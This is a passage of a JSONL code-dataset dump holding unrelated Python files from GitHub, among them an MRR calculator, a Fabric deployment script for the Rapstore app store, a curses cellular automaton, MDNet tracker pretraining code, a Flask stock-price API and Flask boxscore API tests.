unsupported = [\n (Phase.EXECUTE, ConfigShape.DICT),\n (Phase.EXECUTE, ConfigShape.SCALAR),\n (Phase.OUTPUT, ConfigShape.DICT),\n (Phase.OUTPUT, ConfigShape.LIST),\n (Phase.OUTPUT, ConfigShape.SCALAR),\n ]\n context = get_empty_context()\n assert_unsupported(unsupported, node, context)","repo_name":"dylanbenden/python-wfscript","sub_path":"src/wfscript/tests/method/nodes/container/test_choice.py","file_name":"test_choice.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8951640102","text":"import numpy as np\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\n\r\nengsentenceembedding = open('','r')\r\ndesentenceembedding = open('','r')\r\n\r\n# process sentence embedding files: one whitespace-separated vector per line\r\nengsent = []\r\ndesent = []\r\nfor line in engsentenceembedding:\r\n engsent.append([float(tok) for tok in line.split()])\r\n\r\nfor line in desentenceembedding:\r\n desent.append([float(tok) for tok in line.split()])\r\n\r\n# compare each English sentence to all German sentences\r\nrrlist = []\r\nfor engline in engsent:\r\n cossimilarity = []\r\n for deline in desent:\r\n cossimilarity.append(float(cosine_similarity([engline], [deline])[0][0]))\r\n actualline = cossimilarity[engsent.index(engline)]\r\n orderedcos = sorted(cossimilarity, reverse=True)\r\n rank = orderedcos.index(actualline) + 1\r\n reciprocalrank = 1 / rank\r\n rrlist.append(reciprocalrank)\r\n\r\nvalue = 0\r\nfor i in rrlist:\r\n value += i \r\nmrr = value / len(rrlist)\r\nprint(mrr)\r\n\r\nwith open('/project/results/paper2/mrrResult', 'w+', encoding='utf-8') as writeFile:\r\n 
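# write() expects a string, so the MRR float is cast with str()\r\n 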
writeFile.write(str(mrr))","repo_name":"ThinkerPal/nlp-scripts","sub_path":"mrrcalculator.py","file_name":"mrrcalculator.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1804503698","text":"\nimport sys\nimport numpy as np\n\nraw = sys.stdin.read()\n\nlines = [[[int(v) for v in p.split(',')] for p in l.split(' -> ')] for l in raw.split('\\n') if len(l) > 0]\nlines = [((l[0][0], l[1][0]), (l[0][1], l[1][1])) for l in lines]\n\nwidth = 1 + max([max(l[0][0], l[1][0]) for l in lines])\nheight = 1 + max([max(l[0][1], l[1][1]) for l in lines])\n\nmap = np.zeros((width, height), dtype=int)\n\nfor l in lines:\n if l[0][0] == l[0][1]:\n map[l[0][0], min(l[1]):1 + max(l[1])] += 1\n elif l[1][0] == l[1][1]:\n map[min(l[0]):1 + max(l[0]), l[1][0]] += 1\n\nprint('Result:', (map >= 2).sum())\n\n","repo_name":"rolandbernard/adventofcode-2021","sub_path":"05.hydrothermal-venture/py/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28030728726","text":"# -*- coding:utf-8 -*-\n\"\"\"Rapstore\n\nProject repository: https://github.com/riot-appstore/rapstore\n\"\"\"\n\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\n\nimport os.path\n\nfrom io import BytesIO\n\nfrom fabric.api import task, run, sudo, put, execute\nfrom fabric.contrib.files import sed\nfrom fabric.context_managers import cd\n\nfrom . import common\nfrom .config import server_config as config\n\nCUR_DIR = os.path.abspath(os.path.dirname(__file__))\nROOT_DIR = \"/home/root\"\n\n\n@task\ndef setup():\n \"\"\"Setup RIOT AppMarket\"\"\"\n common.apt_install('python-mysqldb')\n common.apt_install('python-pip')\n\n run('pip install pycrypto')\n execute(setup_apache)\n execute(setup_www_data)\n\n # Debugging library\n run('pip install q')\n\n\nGITCONFIG = '''\\\n[user]\n\\temail = {user}@localhost\n\\tname = {title} {title}\n'''\n\n\n@task\ndef setup_www_data():\n \"\"\"Setup www-data .gitconfig for compiling packages (using git am).\"\"\"\n user = 'www-data'\n gitconfig = GITCONFIG.format(user=user, title=user.title())\n config = BytesIO(gitconfig.encode('utf-8'))\n put(config, '/var/www/.gitconfig', use_sudo=True)\n sudo('chown -R www-data:www-data /var/www/')\n\n\n@task\ndef setup_nginx():\n put(\"nginx\", \"/var/www\", use_sudo=True)\n sudo('chown -R www-data:www-data /var/www')\n with cd(\"/var/www/nginx\"):\n sudo('cp /etc/letsencrypt/live/demo.riot-apps.net/$(readlink /etc/letsencrypt/live/demo.riot-apps.net/fullchain.pem) /home/root/ssl/fullchain.pem')\n sudo('cp /etc/letsencrypt/live/demo.riot-apps.net/$(readlink /etc/letsencrypt/live/demo.riot-apps.net/privkey.pem) /home/root/ssl/privkey.pem')\n sudo('docker stop nginx || true')\n sudo('docker rm nginx || true')\n sudo('docker build -t nginx .')\n sudo('docker run -d -v /home/root/ssl:/etc/nginx/certs --net=host --name nginx -t nginx')\n\n@task\ndef setup_apache():\n \"\"\"Setup apache server.\"\"\"\n site = '000-default.conf'\n rapstore_conf = '/etc/apache2/sites-available/%s' % site\n\n common.apt_install('apache2')\n sudo('a2enmod cgi')\n sudo('a2enmod proxy_http')\n\n put(common.template('rapstore/apache2/%s' % site), config.RAPSTORE_WEBSITE_ROOT, use_sudo=True)\n sed(rapstore_conf, 'DOCUMENT_ROOT', config.RAPSTORE_WEBSITE_DOCUMENT_ROOT, use_sudo=True)\n sed(rapstore_conf, 'RESOURCES_ROOT', 
config.RAPSTORE_WEBSITE_ROOT, use_sudo=True)\n sudo('a2ensite %s' % site)\n\n execute(setup_rapstore)\n execute(setup_database)\n execute(update_database)\n\n sudo('systemctl restart apache2')\n\n\n@task\ndef setup_rapstore():\n \"\"\"Setup RIOT AM application.\"\"\"\n _setup_rapstore_website_repository()\n _setup_rapstore_backend()\n\n\ndef _setup_rapstore_website_repository(directory=config.RAPSTORE_WEBSITE_ROOT, version='master'):\n \"\"\"Clone website.\"\"\"\n common.clone_repo(config.RAPSTORE_WEBSITE_REPO, directory, version, run_as_user='www-data')\n\n # setup config file with password\n path_to_config = os.path.join(directory, 'rapstore_website', 'config')\n config_file = os.path.join(path_to_config, 'config.py')\n sudo('cp {src} {dst}'.format(src=os.path.join(path_to_config, 'config_EXAMPLE.py'),\n dst=config_file))\n\n # replace password in config file inline\n common.replace_word_in_file(config_file, 'PASSWORD_WEBSITE', config.RAPSTORE_WEBSITE_DB_PASSWORD)\n common.replace_word_in_file(config_file, 'YOUR_SECRET_KEY', config.GITHUB_SECRET_KEY)\n\n writeable_dirs = ['log']\n with cd(directory):\n dirs = ' '.join(writeable_dirs)\n sudo('mkdir -p %s' % dirs)\n sudo('chown www-data %s' % dirs)\n\n put(os.path.join(CUR_DIR, os.pardir,'website.pem'), directory, use_sudo=True)\n\n path_website_key = os.path.join(directory, 'website.pem')\n\n sudo('chmod 600 %s' % path_website_key)\n sudo('chown www-data:www-data %s' % path_website_key)\n\n\ndef _deploy_rapstore(branch_name, env_file, folder_name=None, dirty=None, prod=False):\n execute(setup_www_data)\n folder_name = folder_name if folder_name else branch_name\n folder=os.path.join(config.WWW_HOME,folder_name)\n sudo('mkdir -p %s' % folder)\n sudo('chown www-data %s' % folder)\n with cd(folder):\n common.pull_or_clone(config.RAPSTORE_DJANGO_REPO, 'rapstore-django', branch_name, '', run_as_user='www-data')\n if not dirty:\n put('docker-compose.yml', os.path.join(folder, \"docker-compose.yml\"), use_sudo=True)\n if not prod:\n put('docker-compose.override.yml', os.path.join(folder, \"docker-compose.override.yml\"), use_sudo=True)\n else:\n put('docker-compose.prod.yml', os.path.join(folder, \"docker-compose.override.yml\"), use_sudo=True)\n put(env_file, os.path.join(folder, \".env\"), use_sudo=True)\n sudo(\"cat {0}/.oauth.{1} >> .env \".format(ROOT_DIR, folder_name))\n common.docker_refresh()\n\ndef _populate_db(folder_name):\n folder=os.path.join(config.WWW_HOME,folder_name)\n with cd(folder):\n sudo('docker-compose exec web python manage.py populate_db')\n\ndef _createsuperuser(folder_name):\n folder=os.path.join(config.WWW_HOME,folder_name)\n with cd(folder):\n sudo('docker-compose exec web python manage.py createsuperuser')\n\n\ndef _validate_folder(folder_name):\n if folder_name not in [\"develop\", \"master\", \"staging\"]:\n return False\n return True\n\n@task\ndef populate_db(folder=\"develop\"):\n if(_validate_folder(folder)):\n _populate_db(folder)\n\n@task\ndef createsuperuser(folder=\"develop\"):\n if(_validate_folder(folder)):\n _createsuperuser(folder)\n\ndef _setup_rapstore_backend(directory=config.RAPSTORE_BACKEND, version='master'):\n \"\"\"Clone backend which clones RIOT.\n\n Setup write permissions on required directories.\n \"\"\"\n common.clone_repo(config.RAPSTORE_BACKEND_REPO, directory, version, '--recursive', run_as_user='www-data')\n sudo('chmod -R g-w %s' % directory) # TODO: fixup in the repository\n\n # setup config file with password\n config_file_config = os.path.join(os.path.join(directory, 
'rapstore_backend', 'config', 'config.py'))\n config_file_setup = os.path.join(os.path.join(directory, 'rapstore_backend', 'setup', 'db_config.py'))\n\n sudo('cp {src} {dst}'.format(src=os.path.join(directory, 'rapstore_backend', 'config', 'config_EXAMPLE.py'),\n dst=config_file_config))\n\n sudo('cp {src} {dst}'.format(src=os.path.join(directory, 'rapstore_backend', 'setup', 'db_config_EXAMPLE.py'),\n dst=config_file_setup))\n\n # replace password in config file inline\n common.replace_word_in_file(config_file_config, 'PASSWORD_BACKEND', config.RAPSTORE_BACKEND_DB_PASSWORD)\n common.replace_word_in_file(config_file_config, 'PASSWORD_WEBSITE', config.RAPSTORE_WEBSITE_DB_PASSWORD)\n\n common.replace_word_in_file(config_file_setup, 'PASSWORD_BACKEND', config.RAPSTORE_BACKEND_DB_PASSWORD)\n common.replace_word_in_file(config_file_setup, 'PASSWORD_WEBSITE', config.RAPSTORE_WEBSITE_DB_PASSWORD)\n\n common.replace_word_in_file(config_file_setup, 'USER_PRIVILEGED', config.DB_USER)\n common.replace_word_in_file(config_file_setup, 'PASSWORD_PRIVILEGED', config.DB_PASSWORD)\n\n _setup_riot_stripped(os.path.join(directory, 'rapstore_backend'))\n _setup_rapstore_backend_writeable_directories(directory)\n\n\ndef _setup_riot_stripped(directory):\n \"\"\"Create RIOT_stripped for the backend.\"\"\"\n with cd(directory):\n sudo('python strip_riot_repo.py')\n\n\ndef _setup_rapstore_backend_writeable_directories(directory):\n \"\"\"Setup the writeable directories required by the backend.\"\"\"\n # TODO set this configurable somehow\n writeable_dirs = ['tmp', 'log', 'RIOT/generated_by_rapstore']\n with cd(directory):\n dirs = ' '.join(writeable_dirs)\n sudo('mkdir -p %s' % dirs)\n sudo('chown www-data %s' % dirs)\n\n\n@task\ndef setup_database():\n \"\"\"Setup database.\n\n Install and init tables.\n \"\"\"\n common.apt_install('mysql-server')\n\n # Scripts expects to be run from the setup directory\n with cd(os.path.join(config.RAPSTORE_BACKEND, 'rapstore_backend', 'setup')):\n\n sudo('python %s' % 'db_create.py')\n sudo('python %s' % 'db_setup.py')\n\n\n@task\ndef update_database():\n \"\"\"Update database with RIOT information.\"\"\"\n with cd(os.path.join(config.RAPSTORE_BACKEND, 'rapstore_backend', 'tasks', 'database')):\n sudo('python %s' % 'db_update.py')\n","repo_name":"riot-appstore/rapstore-vm","sub_path":"rapstorevm/rapstore.py","file_name":"rapstore.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24371093929","text":"#!/usr/bin/env python3\nfrom copy import deepcopy\n\nimport curses\nimport time\nimport numpy as np\nimport random\n\nimport helper\n\ndef show(stdscr, matrix):\n\tfor x in range(len(matrix)):\n\t\tfor y in range(len(matrix[0])):\n\t\t\tif matrix[x][y] == 0:\n\t\t\t\tstdscr.insstr(x,y,\".\")\n\t\t\telse:\n\t\t\t\tstdscr.insstr(x,y,\"\\u2588\")\n\tstdscr.refresh()\n\ndef init(rows,columns, seed = None):\n\t#procedural generation\n\trandom.seed(seed)\n\tmatrix = np.zeros((rows,columns), dtype=int)\n\n\tfor x in range(rows):\n\t\tfor y in range(columns):\n\t\t\tif random.randint(0,1) == 0: \n\t\t\t\tmatrix[x][y] = 1\n\t\t\telse:\n\t\t\t\tmatrix[x][y] = 0\n\treturn matrix\n\ndef cave(matrix, generations):\n\t##CODE HERE##\n\treplacement = []\n\tfor z in range(generations):\n\t\treplacement = np.ones((len(matrix),len(matrix[0])),dtype = int)\n\t\t\n\t\tfor x in range(1,len(matrix)-1):\n\t\t\tfor y in range(1,len(matrix[0])-1):\n\t\t\t\t\n\t\t\t\ttotal = -matrix[x][y]\n\t\t\t\tfor a 
in range(x-1,x+2):\n\t\t\t\t\tfor b in range(y-1,y+2):\n\t\t\t\t\t\ttotal += matrix[a][b]\n\n\t\t\t\tif total > 5:\n\t\t\t\t\treplacement[x][y] = 1\n\t\t\t\telif total < 4:\n\t\t\t\t\treplacement[x][y] = 0\n\t\t\t\telse:\n\t\t\t\t\treplacement[x][y] = matrix[x][y]\n\n\t\tmatrix = replacement\n\treturn replacement\n\ndef evolve(matrix):\n\t##CODE HERE##\n\treplacement = np.zeros((len(matrix),len(matrix[0])),dtype = int)\n\n\tfor x in range(1,len(matrix)-1):\n\t\tfor y in range(1,len(matrix[0])-1):\n\t\t\t\n\t\t\ttotal = -matrix[x][y]\n\t\t\tfor a in range(x-1,x+2):\n\t\t\t\tfor b in range(y-1,y+2):\n\t\t\t\t\ttotal += matrix[a][b]\n\n\t\t\tif matrix[x][y] != 0:\n\t\t\t\tif total < 2:\n\t\t\t\t\treplacement[x][y] = 0\n\t\t\t\telif total == 2 or total == 3:\n\t\t\t\t\treplacement[x][y] = 1\n\t\t\t\telif total > 3:\n\t\t\t\t\treplacement[x][y] = 0\n\t\t\telse:\n\t\t\t\tif total == 3:\n\t\t\t\t\treplacement[x][y] = 1\n\t\t\t\telse:\n\t\t\t\t\treplacement[x][y] = 0\n\n\treturn replacement\n\ndef main(stdscr):\n\thelper.setup()\n\trows, columns = helper.screen_size()\n\n\tautoma = init(rows,columns)\n\tshow(stdscr,automa)\n\n\t##CODE HERE##\n\n\twhile True:\n\t\tchoice = chr(stdscr.getch())\n\n\t\tif choice == \"0\":\n\t\t\tbreak;\n\n\t\tautoma = cave(automa, 1)\n\t\t#automa = evolve(automa)\n\t\tshow(stdscr,automa)\n\n#MAIN\nif (__name__ == '__main__'):\n\tcurses.wrapper(main)\n","repo_name":"iron512/LCSEproject","sub_path":"automa.py","file_name":"automa.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23354290240","text":"import re\nfrom aiohttp import web\nimport os\nfrom aiohttp_middlewares import cors_middleware\n\nfrom handlers import *\n\n\n# cors_rules = cors_middleware(origins=[re.compile(r\"(localhost(:[\\d]+))?\")])\n# middlewares = [cors_rules]\napp = web.Application()\n\napp.add_routes(\n [\n web.get(\"/\", index),\n web.post(\"/transcripts/-/feed\", create_feed_transcript),\n web.get(\"/transcripts\", get_transcripts),\n web.post(\"/transcripts\", create_transcript),\n web.delete(\"/transcripts/{id}\", delete_transcript),\n web.put(\"/transcripts/{id}\", update_transcript),\n web.get(\"/transcripts/{id}\", get_transcript_resource),\n web.post(\"/transcripts:create_table\", create_transcript_table),\n web.delete(\"/transcripts:drop_table\", drop_transcript_table),\n web.post(\"/transcripts:seed\", seed_transcript),\n web.get(\"/documentation\", documentation),\n ]\n)\n\nweb.run_app(app, port=os.getenv(\"PORT\", 8080))\n","repo_name":"JoshCLWren/trnscrptr","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26336268058","text":"import time\n\nfrom app import load_setting, save_setting\nfrom app.lib import Ufw, Rule\nfrom app.main.services.rule import RuleService\n\n\ndef ufw_status(ufw: Ufw, expire_time=60):\n now = time.time()\n status = load_setting('ufw_status') # type: dict\n if status is None:\n status = ufw.status(parse_rule=False)\n elif now - status.get('status_time', 0) >= expire_time:\n status.update(**ufw.status(parse_rule=False))\n else:\n return status\n\n status['status_time'] = now\n save_setting('ufw_status', status)\n\n return status\n\n\ndef ufw_sync_rule(ufw: Ufw):\n now = time.time()\n\n service = RuleService()\n for item in service.query.all():\n service.delete_item(item, commit_now=False)\n\n status = ufw.status()\n 
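# stamp the snapshot so the ufw_status() cache treats it as fresh before persisting\n 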
status['status_time'] = now\n status['rules_time'] = now\n\n rules = status.pop('rules')\n save_setting('ufw_status', status)\n\n for rule in rules: # type: Rule\n service.add_item(commit_now=False, **rule.data)\n\n service.commit()\n","repo_name":"HsOjo/UfwWebAdmin","sub_path":"app/main/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36568113550","text":"def run(): \r\n n = int(input())\r\n if(n > 10):\r\n print('INVALID INPUT')\r\n else:\r\n dict = {}\r\n for i in range(n):\r\n a = input().split()\r\n dict[a[0]] = a[1]\r\n tong = 0\r\n tich = 1\r\n for i in dict.keys():\r\n if dict[i].isdigit():\r\n tong += int(dict[i])\r\n tich *= int(dict[i])\r\n print(tong, tich)\r\nrun()\r\n\r\n# 4\r\n# a 9\r\n# b 5\r\n# c abc\r\n# d 1\r\n# 6371 ->","repo_name":"HieuAnh87/Python_ptit","sub_path":"Contest/Thi cuối kỳ 11.1.2022/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"768138264","text":"import os\r\nimport shutil\r\n\r\n# check whether a file/directory exists\r\nprint('Check whether a file/directory exists\\n')\r\n\r\npath = 'sample.py'\r\n\r\nif os.path.exists(path):\r\n print('The specified path exists')\r\n\r\n if os.path.isfile(path):\r\n print('It is a file')\r\n if os.path.isdir(path):\r\n print('It is a directory')\r\nelse:\r\n print('The specified path does not exist')\r\n\r\n# creating and deleting files/directories\r\n# deleting a file\r\nprint('\\nDeleting a file\\n')\r\n#os.remove('file1.txt') # raises an error if it does not exist\r\n\r\n# creating directories\r\nprint('\\nCreating directories\\n')\r\n\r\nos.mkdir('dir_1')\r\nos.makedirs('dir_2/dir_3')\r\n\r\n# deleting directories\r\nos.rmdir('dir_1')\r\nos.removedirs('dir_2/dir_3')\r\n\r\n# moving and copying files/directories\r\n#shutil.copy('sample.txt', 'sample2.txt') # copy a single file\r\n#shutil.copytree('dir_1/', 'dir_2/') # recursively copy the whole directory\r\n# raises an error if the source does not exist","repo_name":"maato-origin/PythonPractice","sub_path":"6-2.py","file_name":"6-2.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72107517211","text":"from flask import Flask, request\nimport yfinance as yf\nimport pandas as pd\nfrom datetime import date, timedelta\nimport happystockapi_pb2 as happystock\n\n\napp = Flask(__name__)\n\ndef fetchStockPrices(ticker):\n\n stockPriceList = happystock.listStockPrice()\n\n tickerInfo = yf.Ticker(ticker)\n\n todayDate = date.today() + timedelta(days=1)\n weekAgoDate = date.today() - timedelta(days=8)\n stockHistory = tickerInfo.history(start=weekAgoDate.strftime(\"%Y-%m-%d\"), end=todayDate.strftime(\"%Y-%m-%d\"), interval=\"1d\")\n\n \n for i in range(7):\n day = date.today() - timedelta(days=6-i) \n\n stockItem = stockPriceList.priceList.add()\n stockItem.name = ticker \n stockItem.date.FromDatetime(pd.to_datetime(day))\n\n while day.strftime(\"%Y-%m-%d\") not in stockHistory.index:\n day = day - timedelta(days=1)\n\n dayStockData = stockHistory.loc[day.strftime(\"%Y-%m-%d\")]\n stockItem.price = round(dayStockData['Close'], 2)\n\n return stockPriceList\n\n@app.route(\"/stock_price\", methods=['GET'])\ndef returnStockPrices():\n stockPriceList = {}\n if 'ticker' in request.args: \n ticker = request.args['ticker']\n stockPriceList = fetchStockPrices(ticker)\n headers = {'Access-Control-Allow-Origin': '*'}\n data = stockPriceList.SerializeToString()\n return data, 
headers\n","repo_name":"alex-he8276/hack-the-stocks","sub_path":"stockPriceApi/stockPrice.py","file_name":"stockPrice.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"32257706058","text":"trees = open(\"input.txt\").read().strip().splitlines()\nvisible, scenic = set(), 0\n\nfor x in range(len(trees)):\n for y in range(len(trees)):\n score = 1\n pos = trees[x][y]\n left = trees[x][:y][::-1]\n right = trees[x][y+1:len(trees)]\n up = [trees[nx][y] for nx in reversed(range(x))]\n down = [trees[nx][y] for nx in range(x+1,len(trees))]\n \n for direction in left, right, up, down:\n for n, neighbour in enumerate(direction):\n if pos <= neighbour:\n score *= n+1; break\n else:\n score *= len(direction) if direction else 1\n visible.add((x,y))\n scenic = max(scenic, score)\n \nprint(\"p1: \",len(visible))\nprint(\"p2: \", scenic)\n","repo_name":"paulphys/adventofcode","sub_path":"2022/day08/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18091331976","text":"import tensorflow as tf\nimport numpy as np\nfrom models import MDNet\nimport reader\nimport proc\nimport os\nimport argparse\n\n\nclass Config(object):\n momentum = 0.9\n weight_decay = 0.0005\n lr_rate = 0.0001\n lr_rates = {'conv': 1.0, 'bias': 2.0, 'fc6-conv': 10.0, 'fc6-bias': 20.0}\n\n batch_frames = 8\n batch_size = 128\n batch_pos = 32\n batch_neg = 96\n num_cycle = 100\n\n posPerFrame = 50\n negPerFrame = 200\n scale_factor = 1.05\n input_size = 107\n\n pos_range = [0.7, 1]\n neg_range = [0, 0.5]\n\ndef pretrain_mdnet(datasets, init_model_path, result_dir, load_path=None, shuffle=True, norm=False, dropout=True, regularization=True):\n config = Config()\n\n # print parameters\n print('shuffle', shuffle)\n print('norm', norm)\n print('dropout', dropout)\n print('regularization', regularization)\n print('init_model_path', init_model_path)\n print('result_dir', result_dir)\n\n # create directory\n if not os.path.exists(result_dir):\n os.makedirs(result_dir)\n\n # load sequences\n train_data = reader.read_datasets(datasets)\n K = len(train_data.data)\n\n # create session and saver\n gpu_config = tf.ConfigProto(allow_soft_placement=True)\n sess = tf.InteractiveSession(config=gpu_config)\n\n # load model, weights\n model = MDNet(config)\n model.build_trainer(K, config.batch_size, dropout=dropout, regularization=regularization)\n tf.global_variables_initializer().run()\n model.load(init_model_path,sess)\n sess.run(model.lr_rate.assign(config.lr_rate))\n\n # create saver\n saver = tf.train.Saver([v for v in tf.global_variables() if 'fc6' not in v.name])\n\n # restore from model\n if load_path is not None:\n saver.restore(sess, load_path)\n\n # prepare roidb and frame list\n train_loss_file = open(os.path.join(result_dir, 'train_loss.txt'), 'w')\n n_frames = config.batch_frames*config.num_cycle\n for i in range(config.num_cycle):\n loss_total = 0\n print('###### training cycle '+str(i)+'/'+str(config.num_cycle)+'...') \n\n seq_i = 0\n for seq, seq_data in train_data.data.iteritems():\n print('### training video \"'+seq+'\"...')\n seq_n_frames = len(seq_data.frames)\n \n ## prepare roidb\n print('- preparing roidb...')\n seq_data.rois = proc.seq2roidb(seq_data, config)\n\n ## prepare frame list\n print('- shuffle frames...')\n seq_data.frame_lists = []\n while len(seq_data.frame_lists) < n_frames:\n 
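# keep concatenating shuffled frame permutations until at least n_frames indices are available\n 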
seq_data.frame_lists = np.r_[seq_data.frame_lists, np.random.permutation(seq_n_frames)]\n seq_data.frame_lists = seq_data.frame_lists[:n_frames]\n\n ## start training\n # extract batch_size frames\n frame_inds = seq_data.frame_lists[config.batch_frames * i: config.batch_frames * (i+1)].astype(np.int)\n\n # sample boxes\n pos_boxes = np.concatenate([seq_data.rois[frame_ind].pos_boxes for frame_ind in frame_inds], axis=0)\n neg_boxes = np.concatenate([seq_data.rois[frame_ind].neg_boxes for frame_ind in frame_inds], axis=0)\n pos_inds = np.random.permutation(config.posPerFrame * config.batch_frames)[:config.batch_pos]\n neg_inds = np.random.permutation(config.negPerFrame * config.batch_frames)[:config.batch_neg]\n \n # pack as boxes, paths\n pos_boxes = pos_boxes[pos_inds]\n neg_boxes = neg_boxes[neg_inds]\n boxes = np.r_[pos_boxes, neg_boxes]\n\n box_relinds = np.r_[pos_inds // config.posPerFrame, neg_inds // config.negPerFrame]\n paths = [seq_data.frames[ind] for ind in frame_inds[box_relinds]]\n gts = np.repeat(np.identity(2), [config.batch_pos, config.batch_neg], axis=0)\n patches = proc.load_patch(paths, boxes, norm=False)\n\n # shuffle\n if shuffle:\n inds = np.random.permutation(config.batch_size)\n patches = patches[inds]\n gts = gts[inds]\n\n # training\n _, loss, score, weight, bias = sess.run([model.trainable[seq_i],\n model.losses['loss-'+str(seq_i)],\n model.layers['fc6-'+str(seq_i)],\n model.weights['fc6-'+str(seq_i)],\n model.biases['fc6-'+str(seq_i)]],\n feed_dict={model.layers['input']: patches,\n model.layers['y-'+str(seq_i)]: gts})\n print(seq_i)\n print(score.reshape(-1, 2)[:5])\n print(gts[:5])\n print(np.mean(loss))\n print(weight)\n print(bias)\n loss_total += np.mean(loss)\n\n # update seq_i\n seq_i += 1\n\n ## save the model\n train_loss_file.write('Epoch '+str(i)+', Loss: '+str(np.mean(loss)))\n saver.save(sess, os.path.join(result_dir, 'model_e'+str(i)+'.ckpt'), global_step=i+1)\n train_loss_file.close()\n\ndef get_params():\n parser = argparse.ArgumentParser()\n parser.add_argument('--no_shuffle', action='store_true', help='disable shuffling frames')\n parser.add_argument('--norm', action='store_true', help='normalize input image')\n parser.add_argument('--no_dropout', action='store_true', help='disable dropout')\n parser.add_argument('--no_regularization', action='store_true', help='disable regularization')\n parser.add_argument('--result_dir', help='places to store the pretrained model')\n parser.add_argument('--dataset', choices=['otb', 'vot', 'otb_vot'], help='choose pretrained dataset: [vot/otb/otb_vot]')\n parser.add_argument('--init_model_path', help='initial model path')\n parser.add_argument('--load_path', default=None, help='initial model path')\n return parser.parse_args()\n\ndef main():\n params = get_params()\n if params.dataset == 'otb':\n datasets = ['otb']\n elif params.dataset == 'vot':\n datasets = ['vot2013', 'vot2014', 'vot2015']\n elif params.dataset == 'otb_vot':\n datasets = ['otb', 'vot2013', 'vot2014', 'vot2015']\n\n pretrain_mdnet(datasets, load_path=params.load_path, init_model_path=params.init_model_path, result_dir=params.result_dir,\n shuffle=(not params.no_shuffle), norm=params.norm, dropout=(not params.no_dropout), regularization=(not params.no_regularization))\n\nif __name__ == '__main__':\n main()\n","repo_name":"zhyj3038/PyMDNet","sub_path":"pretrain.py","file_name":"pretrain.py","file_ext":"py","file_size_in_byte":6124,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} 
+{"seq_id":"42465007897","text":"import unittest\nimport json\n\nfrom app import create_app_test\nfrom app.db_models import db\nfrom app.services.logger import getLogger\nfrom provisioning import complete_provisioning\n\nURL = '/api/boxscores/'\n\n\nclass TestBoxscore(unittest.TestCase):\n def setUp(self):\n app = create_app_test()\n self.app = app\n\n db.init_app(app)\n db.app = app\n with self.app.app_context():\n db.drop_all()\n db.create_all()\n complete_provisioning(db)\n self.app = app.test_client()\n\n\nclass AllBoxscoresTestCase(TestBoxscore):\n \"\"\"\n Test getting all boxscores at given date\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + '2019/2/18')\n assert r.status_code == 200\n assert len(r.json) == 2\n assert r.json['status'] == 'OK'\n assert len(r.json['data']) == 2\n assert r.json['data'][0] == {'player': {'id': 1, 'team': 1, 'first_name': 'Daryl', 'last_name': 'Watkins'}, 'game': 1,\n 'min': '12:34', 'dnp': False, 'pts': 21, 'reb': 10, 'ast': 15, 'stl': 1, 'blk': 3, 'to': 0,\n 'fga': 10, 'fgm': 7, 'tpa': 2, 'tpm': 2, 'fta': 4, 'ftm': 1, 'ttfl_score': 54}\n assert r.json['data'][1] == {'player': {'id': 2, 'team': 1, 'first_name': 'Alexis', 'last_name': 'Ajinça'}, 'game': 1,\n 'min': '22:45', 'dnp': False, 'pts': 0, 'reb': 0, 'ast': 0, 'stl': 0, 'blk': 0, 'to': 2,\n 'fga': 10, 'fgm': 0, 'tpa': 2, 'tpm': 0, 'fta': 4, 'ftm': 0, 'ttfl_score': -18}\n\n\nclass AllBoxscoresInvalidDateTestCase(TestBoxscore):\n \"\"\"\n Test getting boxscores with invalid date\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + '2019/32/18')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Invalid date'\n\n\nclass AllBoxscoresDateFutureTestCase(TestBoxscore):\n \"\"\"\n Test getting boxscores with date in the future\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + '9999/2/18')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Date in the future'\n\n\nclass AllPlayerBoxscoresTestCase(TestBoxscore):\n \"\"\"\n Test getting all player's boxscores\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'player/1')\n assert r.status_code == 200\n assert len(r.json) == 2\n assert r.json['status'] == 'OK'\n assert len(r.json['data']) == 2\n assert r.json['data'][0] == {'player': 1, 'game': 1, 'min': '12:34', 'dnp': False, 'pts': 21, 'reb': 10, 'ast': 15, 'stl': 1,\n 'blk': 3, 'to': 0, 'fga': 10, 'fgm': 7, 'tpa': 2, 'tpm': 2, 'fta': 4, 'ftm': 1, 'ttfl_score': 54}\n assert r.json['data'][1] == {'player': 1, 'game': 2, 'min': '48:00', 'dnp': False, 'pts': 4, 